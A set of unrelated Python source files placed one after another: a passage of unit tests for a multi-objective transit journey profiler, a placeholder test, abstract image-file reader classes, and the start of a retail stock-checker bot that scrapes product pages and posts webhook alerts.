    # expected minimal number of boardings per origin stop
    stop_to_n_boardings = {
        2: 1,
        7: 2,
        3: 0
    }
    for stop, n_veh_legs in stop_to_n_boardings.items():
        labels = csa_profile.stop_profiles[stop].get_final_optimal_labels()
        self.assertEqual(len(labels), 1)
        self.assertEqual(labels[0].n_boardings, n_veh_legs)
def test_reset(self):
    """reset() should allow re-running the profiler against new target stops.

    After the first run (target 2), stops 0 and 1 have labels. After
    reset([1]) and a second run, the label counts must reflect the new
    target (stops 0 and 3 can reach stop 1).
    """
    walk_speed = 1
    target_stop = 2
    start_time = 0
    end_time = 60
    transfer_margin = 0
    transit_connections = [
        Connection(0, 1, 40, 50, "trip_1", 1),
        Connection(1, 2, 55, 60, "trip_1", 1),
        Connection(3, 1, 40, 60, "trip_2", 1)
    ]
    csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                  start_time, end_time, transfer_margin,
                                                  networkx.Graph(), walk_speed)
    csa_profile.run()
    nodes = [0, 1, 2, 3]
    # expected optimal-label counts per node with target stop 2
    label_counts = [1, 1, 0, 0]
    for node, count in zip(nodes, label_counts):
        n_labels = len(csa_profile.stop_profiles[node].get_final_optimal_labels())
        self.assertEqual(n_labels, count)
    # re-target the profiler at stop 1 and run again
    target_stops = [1]
    csa_profile.reset(target_stops)
    csa_profile.run()
    label_counts = [1, 0, 0, 1]
    for node, count in zip(nodes, label_counts):
        n_labels = len(csa_profile.stop_profiles[node].get_final_optimal_labels())
        self.assertEqual(n_labels, count)
    # TODO: perform a check for the reinitialization of trip_labels
    # THIS IS NOT YET TESTED but should work at the moment
    # RK 9.1.2017
def test_550_problem(self):
    """Regression test for real unixtime inputs (route "550").

    There used to be a problem when working with real unixtimes
    (c-side floating point number problems); this test checks that journey
    durations computed from large epoch timestamps come out exact.
    """
    event_data = StringIO(
        "from_stop_I,to_stop_I,dep_time_ut,arr_time_ut,route_type,route_id,trip_I,seq\n" +
        "2198,2247,1475530740,1475530860,3,2550,158249,36\n" +
        "2247,2177,1475530860,1475530980,3,2550,158249,37\n")
    import pandas as pd
    events = pd.read_csv(event_data)
    # connections must be fed in descending departure-time order
    events.sort_values("dep_time_ut", ascending=False, inplace=True)
    connections = [
        # Connection(dep_stop, arr_stop, dep_time, arr_time, trip, seq);
        # here the trip identifier is the integer trip_I
        Connection(int(e.from_stop_I), int(e.to_stop_I), int(e.dep_time_ut), int(e.arr_time_ut),
                   int(e.trip_I),
                   int(e.seq))
        for e in events.itertuples()
    ]
    csa_profiler = MultiObjectivePseudoCSAProfiler(connections, 2177,
                                                   0, 1475530860*10, 0,
                                                   networkx.Graph(), 0)
    csa_profiler.run()
    profiles = csa_profiler.stop_profiles
    labels_2198 = profiles[2198].get_final_optimal_labels()
    self.assertEqual(len(labels_2198), 1)
    self.assertEqual(labels_2198[0].duration(), 1475530980 - 1475530740)
    labels_2247 = profiles[2247].get_final_optimal_labels()
    self.assertEqual(len(labels_2247), 1)
    self.assertEqual(labels_2247[0].duration(), 1475530980 - 1475530860)
def test_transfer_on_same_stop_with_multiple_departures(self):
    """A stop with several simultaneous onward departures must still yield a label.

    Stop 4 has three dead-end departures at t=50 plus the one that actually
    reaches the target at t=70; the origin (stop 0) must end up with at
    least one optimal label.
    """
    walk_speed = 1000
    target_stop = 5
    start_time = 0
    end_time = 60
    transfer_margin = 0
    transit_connections = [
        Connection(0, 4, 30, 40, "trip_1", 1),
        Connection(4, 1, 50, 60, "trip_2", 1),
        Connection(4, 2, 50, 60, "trip_3", 1),
        Connection(4, 3, 50, 60, "trip_4", 1),
        Connection(4, target_stop, 70, 100, "trip_5", 1)
    ]
    csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                   start_time, end_time, transfer_margin,
                                                   networkx.Graph(), walk_speed)
    csa_profiler.run()
    profiles = csa_profiler.stop_profiles
    # Check non-emptiness before indexing so a failure is reported as an
    # assertion error rather than an IndexError (the original asserted
    # labels[0] first, then the length).
    labels = profiles[0].get_final_optimal_labels()
    self.assertGreater(len(labels), 0)
    self.assertIsNotNone(labels[0])
def test_transfer_connections_do_not_affect_transfers(self):
    """Pseudo (walk) connections must not destroy real transfer possibilities.

    Stop 1 is walk-linked to the dead-end stops 3, 4 and 5; those walk
    options must not prevent the origin (stop 0) from getting an optimal
    label via trip_1 + trip_5.
    """
    walk_speed = 1000
    target_stop = 1233412
    start_time = 0
    end_time = 60
    transfer_margin = 0
    transit_connections = [
        Connection(0, 1, 30, 40, "trip_1", 1),
        Connection(3, 4, 45, 50, "trip_2", 1),
        Connection(4, 3, 45, 50, "trip_3", 1),
        Connection(5, 3, 45, 50, "trip_4", 1),
        Connection(1, target_stop, 70, 100, "trip_5", 1)
    ]
    walk_network = networkx.Graph()
    walk_network.add_edge(1, 3, d_walk=1)
    walk_network.add_edge(1, 4, d_walk=1)
    walk_network.add_edge(1, 5, d_walk=1)
    csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                   start_time, end_time, transfer_margin,
                                                   walk_network, walk_speed)
    csa_profiler.run()
    profiles = csa_profiler.stop_profiles
    # Check non-emptiness before indexing so a failure is reported as an
    # assertion error rather than an IndexError (the original asserted
    # labels[0] first, then the length).
    labels = profiles[0].get_final_optimal_labels()
    self.assertGreater(len(labels), 0)
    self.assertIsNotNone(labels[0])
def test_transfer_connections_do_not_affect_transfers2(self):
    """Walk legs between vehicle legs must be counted correctly.

    Expected optimal journey from stop 4: ride 4->3 (dep 0), ride 3->0
    (arr 11)? No -- with walks 2-3 and 1-0 available, the optimal journey
    found here departs at 0, arrives at the target at 7 with 2 boardings
    (4->3 by trip_3, walk 3->2, 2->1 by trip_2, walk 1->0).
    """
    walk_speed = 1
    target_stop = 0
    start_time = 0
    end_time = 60
    transfer_margin = 0
    transit_connections = [
        Connection(3, 0, 10, 11, "trip_1", 1),
        Connection(2, 1, 5, 6, "trip_2", 1),
        Connection(4, 3, 0, 1, "trip_3", 1)
    ]
    walk_network = networkx.Graph()
    walk_network.add_edge(2, 3, d_walk=1)
    walk_network.add_edge(1, 0, d_walk=1)
    csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                   start_time, end_time, transfer_margin,
                                                   walk_network, walk_speed)
    csa_profiler.run()
    profiles = csa_profiler.stop_profiles
    assert(len(profiles[4].get_final_optimal_labels()) == 1)
    optimal_label = profiles[4].get_final_optimal_labels()[0]
    self.assertEqual(optimal_label.departure_time, 0)
    self.assertEqual(optimal_label.arrival_time_target, 7)
    self.assertEqual(optimal_label.n_boardings, 2)
def test_transfer_connections_do_not_affect_transfers3(self):
    """A larger variant: two Pareto-optimal labels must survive from stop 4.

    From stop 4 there should be exactly two optimal journeys: one with
    2 boardings arriving at 11, and one with 3 boardings arriving at 7.
    """
    walk_speed = 1
    target_stop = 0
    start_time = 0
    end_time = 60
    transfer_margin = 0
    transit_connections = [
        Connection(3, 0, 10, 11, "t1", 1),
        Connection(2, 1, 5, 6, "t2", 1),
        Connection(7, 2, 3, 4, "tX", 1),
        Connection(5, 6, 2, 3, "--", 1),
        Connection(4, 3, 0, 1, "t3", 1)
    ]
    walk_network = networkx.Graph()
    walk_network.add_edge(7, 3, d_walk=1)
    walk_network.add_edge(1, 0, d_walk=1)
    walk_network.add_edge(5, 3, d_walk=1)
    csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                   start_time, end_time, transfer_margin,
                                                   walk_network, walk_speed)
    csa_profiler.run()
    profiles = csa_profiler.stop_profiles
    optimal_labels = profiles[4].get_final_optimal_labels()
    # Use a unittest assertion (not a bare assert) and drop the leftover
    # debug print, which would itself raise IndexError on an empty result.
    self.assertEqual(len(optimal_labels), 2)
    boardings_to_arr_time = {}
    for label in optimal_labels:
        boardings_to_arr_time[label.n_boardings] = label.arrival_time_target
    self.assertEqual(boardings_to_arr_time[2], 11)
    self.assertEqual(boardings_to_arr_time[3], 7)
def _assert_label_sets_equal(self, found_tuples, should_be_tuples):
    """Assert that two label collections hold exactly the same elements.

    Equality of lengths plus mutual containment implies set equality
    (labels need not be hashable, so no set() is used).
    """
    self.assertEqual(len(found_tuples), len(should_be_tuples))
    checks = ((found_tuples, should_be_tuples), (should_be_tuples, found_tuples))
    for elements, container in checks:
        for element in elements:
            self.assertIn(element, container)
def test_stored_route(self):
    """With track_route=True every label chain must encode a valid journey.

    Walks each label's previous_label chain, collects the vehicle legs
    (Connection instances) and checks that the legs are unique and form a
    continuous path.
    """
    # TODO:
    # - test with multiple targets
    # - test with continuing route
    # - test that timestamps for label and the connection objects match
    csa_profile = MultiObjectivePseudoCSAProfiler(self.transit_connections, self.target_stop,
                                                  self.start_time, self.end_time, self.transfer_margin,
                                                  self.walk_network, self.walk_speed, track_route=True)
    csa_profile.run()
    for stop, profile in csa_profile.stop_profiles.items():
        for bag in profile._label_bags:
            for label in bag:
                # print(stop, label)
                cur_label = label
                journey_legs = []
                # follow the backward chain of labels, keeping only real
                # transit legs (Connection instances; walk legs are skipped)
                while True:
                    connection = cur_label.connection
                    if isinstance(connection, Connection):
                        journey_legs.append(connection)
                    if not cur_label.previous_label:
                        break
                    cur_label = cur_label.previous_label
                route_tuples_list = [(x.departure_stop, x.arrival_stop) for x in journey_legs]
                # print(route_tuples_list)
                # test that all legs are unique
                self.assertEqual(len(route_tuples_list), len(set(route_tuples_list)))
                prev_arr_node = None
                for route_tuple in route_tuples_list:
                    dep_node = route_tuple[0]
                    arr_node = route_tuple[1]
                    # test that all legs have unique departure and arrival nodes
                    self.assertNotEqual(dep_node, arr_node)
                    if prev_arr_node:
                        # test that legs form an continuous path
                        self.assertEqual(prev_arr_node, dep_node)
                    prev_arr_node = arr_node
def test_target_self_loops(self):
    """The target stop itself must not accumulate journey labels.

    Stop 1 is the target; even though 3->1 transit and a 1-3 walk edge
    exist, the target's own profile must stay empty (no self-loop journeys).
    """
    event_list_raw_data = [
        (3, 1, 30, 40, "trip_3", 1)
    ]
    transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
    walk_network = networkx.Graph()
    walk_network.add_edge(1, 3, d_walk=11)
    walk_speed = 1
    target_stop = 1
    transfer_margin = 0
    start_time = 0
    end_time = 50
    # (removed leftover debug prints of the walk network and connections)
    csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                  start_time, end_time, transfer_margin,
                                                  walk_network, walk_speed, track_vehicle_legs=True,
                                                  track_time=True, track_route=True)
    csa_profile.run()
    for stop, profile in csa_profile.stop_profiles.items():
        if stop == target_stop:
            self.assertEqual(len(profile.get_final_optimal_labels()), 0)
def test_journeys_using_movement_duration(self):
    """Smoke test for profiles tracked by movement duration (no assertions).

    With track_vehicle_legs=False the secondary criterion is movement
    duration; this test only prints the unpacked routes for manual
    inspection (the intended assertions are still commented out below).
    """
    def unpack_route_from_labels(cur_label):
        # Walk the previous_label chain backwards, collecting the departure
        # stop of every transit leg, then append the final arrival stop.
        route = []
        last_arrival_stop = None
        while True:
            connection = cur_label.connection
            if isinstance(connection, Connection):
                route.append(connection.departure_stop)
            if not cur_label.previous_label:
                break
            cur_label = cur_label.previous_label
        if isinstance(connection, Connection):
            last_arrival_stop = connection.arrival_stop
        route.append(last_arrival_stop)
        return route
    event_list_raw_data = [
        (1, 2, 0, 10, "trip_1", 1),
        (2, 3, 10, 20, "trip_1", 1),
        (4, 5, 30, 40, "trip_2", 1),
    ]
    transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
    walk_network = networkx.Graph()
    walk_network.add_edge(2, 4, d_walk=10)
    walk_network.add_edge(3, 4, d_walk=10)
    walk_speed = 1
    target_stop = 5
    transfer_margin = 0
    start_time = 0
    end_time = 50
    csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                  start_time, end_time, transfer_margin,
                                                  walk_network, walk_speed, track_vehicle_legs=False,
                                                  track_time=True, track_route=True)
    csa_profile.run()
    for stop, profile in csa_profile.stop_profiles.items():
        for label_bag in profile._label_bags:
            for label in label_bag:
                print('origin:', stop, 'n_boardings/movement_duration:', label.movement_duration, 'route:', unpack_route_from_labels(label))
    print('optimal labels:')
    for stop, profile in csa_profile.stop_profiles.items():
        for label in profile.get_final_optimal_labels():
            print('origin:', stop, 'n_boardings/movement_duration:', label.movement_duration, 'route:', unpack_route_from_labels(label))
            #if stop == 1:
            #assert 3 not in unpack_route_from_labels(label)
            # print('origin:', stop, 'n_boardings:', label.n_boardings, 'route:', unpack_route_from_labels(label))
def test_journeys_using_movement_duration_last_stop_walk(self):
    """Smoke test like test_journeys_using_movement_duration, with a
    trailing walk edge (5-6) past the target (no assertions; prints only).
    """
    def unpack_route_from_labels(cur_label):
        # Walk the previous_label chain backwards, collecting the departure
        # stop of every transit leg, then append the final arrival stop.
        route = []
        last_arrival_stop = None
        print(cur_label)
        while True:
            print(cur_label.previous_label)
            connection = cur_label.connection
            if isinstance(connection, Connection):
                route.append(connection.departure_stop)
            if not cur_label.previous_label:
                break
            cur_label = cur_label.previous_label
        if isinstance(connection, Connection):
            last_arrival_stop = connection.arrival_stop
        route.append(last_arrival_stop)
        return route
    event_list_raw_data = [
        (1, 2, 0, 10, "trip_1", 1),
        (2, 3, 10, 20, "trip_2", 1),
        (4, 5, 30, 40, "trip_3", 1),
    ]
    transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
    walk_network = networkx.Graph()
    walk_network.add_edge(2, 4, d_walk=10)
    walk_network.add_edge(3, 4, d_walk=10)
    walk_network.add_edge(5, 6, d_walk=10)
    walk_speed = 1
    target_stop = 5
    transfer_margin = 0
    start_time = 0
    end_time = 50
    csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                  start_time, end_time, transfer_margin,
                                                  walk_network, walk_speed, track_vehicle_legs=False,
                                                  track_time=True, track_route=True)
    csa_profile.run()
    for stop, profile in csa_profile.stop_profiles.items():
        for label_bag in profile._label_bags:
            for label in label_bag:
                print('origin:', stop,
                      'n_boardings/movement_duration:', label.movement_duration,
                      'route:', unpack_route_from_labels(label))
    print('optimal labels:')
    for stop, profile in csa_profile.stop_profiles.items():
        for label in profile.get_final_optimal_labels():
            print('origin:', stop,
                  'n_boardings/movement_duration:', label.movement_duration,
                  'route:', unpack_route_from_labels(label))
            #if stop == 1:
            #assert 3 not in unpack_route_from_labels(label)
            # print('origin:', stop, 'n_boardings:', label.n_boardings, 'route:', unpack_route_from_labels(label))
def test_zero_length_journeys_potential_bug_1(self):
    """Zero-duration connections must not create spurious boarding labels.

    trip_1 traverses 0->1->2 in zero time; the only way from stop 1 to the
    target 11 is walking, so every label at stop 1 must have 0 boardings.
    """
    event_list_raw_data = [
        (0, 1, 0, 0, "trip_1", 0),
        (1, 2, 0, 0, "trip_1", 1)
    ]
    transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
    walk_network = networkx.Graph()
    walk_network.add_edge(10, 1, d_walk=20)
    walk_network.add_edge(1, 11, d_walk=20)
    walk_speed = 1
    target_stop = 11
    transfer_margin = 0
    start_time = 0
    end_time = 50
    csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                   start_time, end_time, transfer_margin,
                                                   walk_network, walk_speed,
                                                   track_vehicle_legs=True,
                                                   track_time=True,
                                                   track_route=True)
    csa_profiler.run()
    stop_profile_1 = csa_profiler._stop_profiles[1]
    all_labels_stop_profile_1 = [label for label_bag in stop_profile_1._label_bags for label in label_bag]
    for label in all_labels_stop_profile_1:
        self.assertLess(label.n_boardings, 1, "There should at most a walking label when going from 11 to 1 at any "
                                              "point in time, now one label has " + str(label.n_boardings) +
                                              " boardings"
                        )
def test_zero_length_journeys_potential_bug(self):
    """Zero-duration legs within a trip must still produce journeys.

    trip_1 covers s->a->b instantaneously at t=0, then trip_2 runs b->t;
    both s and a must each end up with exactly one optimal label.
    """
    # readable aliases for the stop ids
    s = 0
    a = 1
    b = 2
    t = 3
    event_list_raw_data = [
        (s, a, 0, 0, "trip_1", 1),
        (a, b, 0, 0, "trip_1", 2),
        (b, t, 1, 2, "trip_2", 0)
    ]
    transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
    walk_network = networkx.Graph()
    walk_speed = 1
    target_stop = t
    transfer_margin = 0
    start_time = 0
    end_time = 50
    csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                   start_time, end_time, transfer_margin,
                                                   walk_network, walk_speed,
                                                   track_vehicle_legs=True,
                                                   track_time=True,
                                                   track_route=True)
    csa_profiler.run()
    stop_profile_a_labels = csa_profiler.stop_profiles[a].get_final_optimal_labels()
    stop_profile_s_labels = csa_profiler.stop_profiles[s].get_final_optimal_labels()
    self.assertEqual(len(stop_profile_a_labels), 1)
    self.assertEqual(len(stop_profile_s_labels), 1)
|
import HAWC2_TCP
def test_something():
    """Placeholder sanity test: verifies the test runner executes at all."""
    expected = 4
    assert expected == 4
|
# coding=utf-8
"""Write multidimensional data line by line"""
from abc import ABCMeta, abstractmethod
from copy import deepcopy
import itertools
import numpy as np
from imagesplit.utils.utilities import to_rgb
from imagesplit.image.image_wrapper import ImageWrapper, ImageStorage
from imagesplit.utils.utilities import rescale_image
# pylint:disable=unnecessary-pass
class ImageFileReader(object):
    """Abstract base for readers that copy data from a source to a destination.

    Note: uses the legacy ``__metaclass__`` attribute (Python-2 style), kept
    as in the original code.
    """

    __metaclass__ = ABCMeta

    @abstractmethod
    def write_image(self, data_source, rescale_limits):
        """Create and write out this file from the given image data source."""
        pass
class LinearImageFileReader(ImageFileReader):
    """Base class for writing data from source to destination line by line"""

    def __init__(self, image_size):
        # image dimensions, first axis is the fastest-varying (line) axis
        self.size = image_size

    @abstractmethod
    def write_line(self, start, image_line, rescale_limits):
        """Write the next line of bytes to the file"""

    @abstractmethod
    def read_line(self, start, num_voxels):
        """Reads a line of bytes from the file"""
        pass

    @abstractmethod
    def close_file(self):
        """Close the file"""
        pass

    def read_image(self, start_local, size_local):
        """Read the specified part of the image.

        Iterates line by line along the first axis, assembling the lines
        into an ImageWrapper and returning its image storage.
        """
        # Compute coordinate ranges
        ranges = [range(st, st + sz) for st, sz in
                  zip(start_local, size_local)]
        # Exclude first coordinate and get others in reverse order
        ranges_to_iterate = ranges[:0:-1]
        # Initialise the output array only when we know the data type
        combined_image = ImageWrapper(origin=start_local,
                                      image_size=size_local)
        # Iterate over each line (equivalent to multiple for loops)
        for start_points in itertools.product(*ranges_to_iterate):
            start = [start_local[0]] + list(reversed(start_points))
            # one full line along the first axis, single voxel elsewhere
            size = np.ones_like(size_local)
            size[0] = size_local[0]
            # Read one image line from the file
            image_line = self.read_line(start, size[0])
            sub_image = ImageWrapper(
                origin=start,
                image=ImageStorage(image_line).reshape(size))
            combined_image.set_sub_image(sub_image)
        return combined_image.image

    def write_image(self, data_source, rescale_limits):
        """Create and write out this file, using data from this image source"""
        # Compute coordinate ranges
        ranges = [range(0, sz) for sz in self.size]
        # Exclude first two coordinates and get others in reverse order
        ranges_to_iterate = ranges[:1:-1]
        # Iterate over each line (equivalent to multiple for loops)
        for main_dim_size in itertools.product(*ranges_to_iterate):
            start = [0] * min(2, len(self.size)) + \
                    list(reversed(main_dim_size))
            # Size contains the first two dimensions and ones
            size = self.size[:2] + [1] * (len(self.size) - 2)
            # Read one image slice from the transformed source
            image_slice = data_source.read_image(start, size)
            # Write out the image data to the file, one line per second-axis row
            for line in range(0, size[1] if len(size) > 1 else 1):
                out_start = deepcopy(start)
                out_size = [self.size[0]] + [1] * (len(self.size) - 1)
                if len(start) > 1:
                    out_start[1] = line
                image_line = image_slice.get_sub_image(out_start,
                                                       out_size).image
                self.write_line(out_start, image_line.get_raw(), rescale_limits)
        self.close_file()
class BlockImageFileReader(ImageFileReader):
    """Base class for writing data from source to destination as a 2d block"""

    @abstractmethod
    def save(self, image):
        """Write the image to the file"""

    @abstractmethod
    def load(self):
        """Reads an image from the file"""
        pass

    @abstractmethod
    def close_file(self):
        """Close the file"""
        pass

    # NOTE: __init__ is defined after the abstract methods in the original;
    # order preserved here.
    def __init__(self, image_size, data_type):
        # expected image dimensions
        self.size = image_size
        # project-specific data-type descriptor (provides numpy format / rgb flag)
        self.data_type = data_type

    def read_image(self, start_local, size_local):
        """Read the specified part of the image.

        Loads the whole block via load(), validates its size, then returns
        the requested sub-image.
        """
        image_data_raw = self.load()
        image_data = ImageStorage.from_raw_image(image_data_raw, self.size)
        if image_data.get_size() != self.size:
            raise ValueError("Image is not the expected size")
        image = ImageWrapper(origin=np.zeros_like(start_local),
                             image=image_data)
        return image.get_sub_image(start_local, size_local).image

    def write_image(self, data_source, rescale_limits):
        """Create and write out this file, using data from this image source"""
        numpy_format = self.data_type.get_numpy_format()
        data_type = np.dtype(numpy_format)
        # read the full image extent from the source in one call
        image_data = \
            data_source.read_image(np.zeros_like(self.size), self.size).image
        image_data_raw = image_data.get_raw_image()
        if rescale_limits:
            image_data_raw = rescale_image(data_type, image_data_raw,
                                           rescale_limits)
        else:
            image_data_raw = np.around(image_data_raw).astype(data_type)
        if self.data_type.get_is_rgb():
            image_data_raw = to_rgb(image_data_raw)
        else:
            # ensure the output dtype matches even if rescaling changed it
            if image_data_raw.dtype != data_type:
                image_data_raw = np.around(image_data_raw).astype(data_type)
        self.save(image_data_raw)
        self.close_file()
|
import requests
import time
import json
from datetime import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
# import webhook_settings
# import product_settings
from threading import Thread
from selenium import webdriver
from chromedriver_py import binary_path as driver_path
from lxml import html
import os
# Global in-memory state shared by all checker classes:
# stockdict maps a product URL (or BestBuy SKU) -> 'True'/'False' stock flag
# (string-valued) used to avoid re-posting duplicate webhook alerts.
stockdict = {}
# sku_dict maps BestBuy SKU -> human-readable product name
sku_dict = {}
# per-retailer lists of tracked URLs/SKUs (populated elsewhere)
bestbuylist = []
targetlist = []
walmartlist = []
bhlist = []
# BestBuy auxiliary lookups (bbimgdict: SKU -> thumbnail image URL)
bbdict = {}
bbimgdict = {}
amazonlist = []
gamestoplist = []
# Function for start-up menu
# Function for start-up menu
def menu():
    """Load webhook and product configuration at startup.

    The interactive menu (webhook/product editing) is currently disabled;
    only the JSON configuration files are loaded. The loaded dicts are
    local here -- the module-level ones are re-read after menu() returns.
    """
    webhook_dict = return_data("./data/webhooks.json")
    url_dict = return_data("./data/products.json")
    # print("Select an Option: \n 1: Edit Webhooks \n 2: Edit Product URLs \n 3: Run the product tracker \n")
    # val = input("Enter # (1-3)")
    # if val == "1":
    #     webhook_settings.main()
    #     menu()
    # elif val == "2":
    #     product_settings.main()
    #     menu()
    # elif val == "3":
    #     print("\n \n Starting Product Tracker! \n \n")
    # else:
    #     menu()
def return_data(path):
    """Load and return the JSON document stored at *path*.

    Args:
        path (str): filesystem path to a JSON file.

    Returns:
        The deserialized JSON content (typically a dict).
    """
    with open(path, "r") as file:
        data = json.load(file)
    # The with-statement closes the file; the explicit file.close() that
    # used to follow was redundant.
    return data
# Prompt the user at startup
menu()
# Only declare the webhook and product lists after the menu has been passed so that changes made from menu selections are up to date
# webhook_dict: webhook name -> Discord/Slack webhook URL
webhook_dict = return_data("./data/webhooks.json")
# url_dict: product URL/SKU -> configuration (consumed by the checker classes)
url_dict = return_data("./data/products.json")
# Declare classes for the webpage scraping functionality
class Amazon:
    """Check an Amazon offer-listing page and post a webhook alert on restock.

    All work happens in __init__: a headless Chrome instance loads the page,
    the offer list is parsed, and a Discord-style webhook is posted when the
    item transitions from out-of-stock to in-stock (tracked via stockdict).
    """

    def __init__(self, url, hook):
        """
        Args:
            url (str): Amazon offer-listing URL to check.
            hook (str): key into webhook_dict for the webhook URL to notify.
        """
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        options = webdriver.ChromeOptions()
        options.add_experimental_option('excludeSwitches', ['enable-logging'])
        options.add_argument('log-level=3')
        options.add_argument('--ignore-certificate-errors')
        options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
        options.add_argument("--headless")
        options.add_argument("--disable-dev-shm-usage")
        # NOTE(review): "--sandbox" is unusual for headless/Heroku setups,
        # where "--no-sandbox" is the common flag -- confirm intent.
        options.add_argument("--sandbox")
        # Heroku setup: browser binary and driver paths come from the environment
        options.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
        driver = webdriver.Chrome(executable_path=os.environ.get("CHROMEDRIVER_PATH"), options=options)
        # driver = webdriver.Chrome(executable_path=driver_path, options=options)
        driver.get(url)
        # renamed from "html" to avoid shadowing the lxml.html module import
        page_source = driver.page_source
        if "To discuss automated access to Amazon data please contact api-services-support@amazon.com." in page_source:
            print("Amazons Bot Protection is preventing this call.")
        else:
            try:
                status_raw = driver.find_element_by_xpath("//div[@id='olpOfferList']")
                status_text = status_raw.text
                title_raw = driver.find_element_by_xpath("//h1[@class='a-size-large a-spacing-none']")
                title_text = title_raw.text
                title = title_text
                now = datetime.now()
                current_time = now.strftime("%H:%M:%S")
                if "Currently, there are no sellers that can deliver this item to your location." not in status_text:
                    print("[" + current_time + "] " + "In Stock: (Amazon.com) " + title + " - " + url)
                    # slack_data = {'content': "[" + current_time + "] " + title + " in stock at Amazon - " + url}
                    img_raw = driver.find_element_by_xpath('//*[@id="olpProductImage"]/a/img')
                    img = img_raw.get_attribute('src')
                    slack_data = {
                        'username': "Amazon Bot",
                        'avatar_url': "https://github.com/tnware/product-checker/blob/master/img/amazon.png",
                        # BUGFIX: content previously said "GameStop Stock Alert:"
                        # (copy-paste from the Gamestop class)
                        'content': "Amazon Stock Alert:",
                        'embeds': [{
                            'title': title,
                            'description': title + " in stock at Amazon",
                            'url': url,
                            "fields": [
                                {
                                    "name": "Time:",
                                    "value": current_time
                                },
                                {
                                    "name": "Status:",
                                    "value": "In Stock"
                                }
                            ],
                            'thumbnail': {
                                'url': img
                            }
                        }]
                    }
                    # only alert on an out-of-stock -> in-stock transition
                    if stockdict.get(url) == 'False':
                        response = requests.post(
                            webhook_url, data=json.dumps(slack_data),
                            headers={'Content-Type': 'application/json'})
                    stockdict.update({url: 'True'})
                else:
                    print("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title)
                    stockdict.update({url: 'False'})
            except Exception as e:
                print("Error while parsing", e)
            finally:
                # always release the browser, even on parse errors
                driver.quit()
class Gamestop:
    """Check a GameStop product page and post a webhook alert on restock.

    All work happens in __init__: a headless Chrome instance loads the page,
    the add-to-cart button state is inspected, and a Discord-style webhook is
    posted when the item transitions from out-of-stock to in-stock
    (tracked via the module-level stockdict).
    """

    def __init__(self, url, hook):
        # url: GameStop product page; hook: key into webhook_dict
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        options = webdriver.ChromeOptions()
        options.add_experimental_option('excludeSwitches', ['enable-logging'])
        options.add_argument('log-level=3')
        options.add_argument('--ignore-certificate-errors')
        options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
        options.add_argument("--headless")
        options.add_argument("--disable-dev-shm-usage")
        # NOTE(review): "--no-sandbox" is the usual flag here -- confirm intent
        options.add_argument("--sandbox")
        # Heroku setup: browser binary and driver paths come from the environment
        options.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
        driver = webdriver.Chrome(executable_path=os.environ.get("CHROMEDRIVER_PATH"), options=options)
        # driver = webdriver.Chrome(executable_path=driver_path, options=options)
        driver.get(url)
        # status_raw = driver.find_element_by_xpath("//div[@class='add-to-cart-buttons']")
        # status_text = status_raw.text
        try:
            status_raw = driver.find_elements_by_class_name('add-to-cart-buttons')
            status_text = status_raw[0].text
            title_raw = driver.find_element_by_xpath("//h1[@class='product-name h2']")
            title_text = title_raw.text
            title = title_text
            # image_raw = driver.find_element_by_xpath("//img[@class='mainImg']")
            # image_raw = driver.find_element_by_class_name('product-main-image-gallery')
            # img = image_raw.get_attribute('src')
            now = datetime.now()
            current_time = now.strftime("%H:%M:%S")
            if "ADD TO CART" in status_text:
                print("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url)
                slack_data = {
                    'username': "GameStop Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/blob/master/img/gamestop.png",
                    'content': "GameStop Stock Alert:",
                    'embeds': [{
                        'title': title,
                        'description': title + " in stock at GameStop",
                        'url': url,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Status:",
                                "value": "In Stock"
                            }
                        ],
                        # 'thumbnail': {
                        #     'url': img
                        # }
                    }]
                }
                # only alert on an out-of-stock -> in-stock transition
                if stockdict.get(url) == 'False':
                    response = requests.post(
                        webhook_url, data=json.dumps(slack_data),
                        headers={'Content-Type': 'application/json'})
                stockdict.update({url: 'True'})
            else:
                print("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title)
                stockdict.update({url: 'False'})
        except Exception as e:
            print("Error while parsing", e)
        finally:
            # always release the browser, even on parse errors
            driver.quit()
class Target:
    """Check a Target product page and post a webhook alert on restock.

    Uses plain requests + lxml (no browser). Stock is inferred from the
    presence of the literal text "Deliver to" in the page body -- a fragile
    heuristic that breaks if Target changes its markup.
    """

    def __init__(self, url, hook):
        # url: Target product page; hook: key into webhook_dict
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        page = requests.get(url)
        al = page.text
        tree = html.fromstring(page.content)
        # grab the first <img> and slice its attrib-dict repr to get the src;
        # the magic offsets [20:-2] assume a fixed "{'src': '...'}" layout
        imgs = tree.xpath("//img[1]")
